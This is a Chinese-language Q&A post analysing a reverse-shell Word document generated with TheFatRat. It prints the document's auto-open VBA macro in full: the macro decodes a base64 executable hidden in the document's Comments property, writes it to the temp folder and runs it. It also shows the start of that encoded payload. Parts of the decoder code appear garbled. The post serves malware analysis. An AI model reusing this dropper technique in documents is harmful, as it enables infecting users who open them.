问题描述
我用 TheFatRat 创建了一个反向 shell Microsoft Word 文档,它主要创建反向 shell!
现在,我想对其进行逆向工程,所以我提出了 REMNUX(带有一些逆向工程工具的 Ubuntu)。
我使用过 oledump.py 并且输出是:
remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
A1: 385 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 5871 'VBA/NewMacros'
A4: m 1073 'VBA/ThisDocument'
A5: 4400 'VBA/_VBA_PROJECT'
A6: 734 'VBA/dir'
A3 部分有这些宏:
remnux@remnux:~$ oledump.py kjbk.docm -v(decompress) -s A3
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub Autoopen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value,56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
System ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller,http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller,Motobit Software,http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMnopQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength,sOut,groupBegin
base64String = Replace(base64String,vbCrLf,"")
base64String = Replace(base64String,vbTab," ","")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1,"Base64Decode","Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes,CharCounter,thisChar,thisData,nGroup,pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String,groupBegin + CharCounter,1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1,Base64,vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2,"Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup),"0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup,1,2))) + _
Chr(CByte("&H" & Mid(nGroup,3,5,2)))
sOut = sOut & Left(pOut,numDataBytes)
Next
Base64Decode = sOut
End Function
它显然解码了一些 Base64 代码并运行它,问题是,我在这些 A1...A6 部件的任何一个文件上都找不到任何 Base64(反向 shell 代码)。那么反向shell代码在哪里?
我已将文件上传到这些位置,密码为 123,它会创建到本地网络 (192.168....) 的反向 shell,因此它是无害的。
解决方法
让我们在我忘记之前回答它,我敢打赌 TheFatRat 开发人员对这个分析不满意,但我找到了反向 shell 代码。
与 Emotet 恶意软件不同,oledump 等工具无法检测到 Base64 代码(它只查看受感染文档的 word 目录),并且它不会隐藏在主文档 XML 文件中,我确实用 Ubuntu 打开了 Microsoft Word 文件档案管理器和瞧:
可执行文件隐藏在 docProps 目录中!它是 Base64 并且包含反向 shell 代码!这将复制到 Windows 临时文件夹。
第一行:
<cp:coreProperties>
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA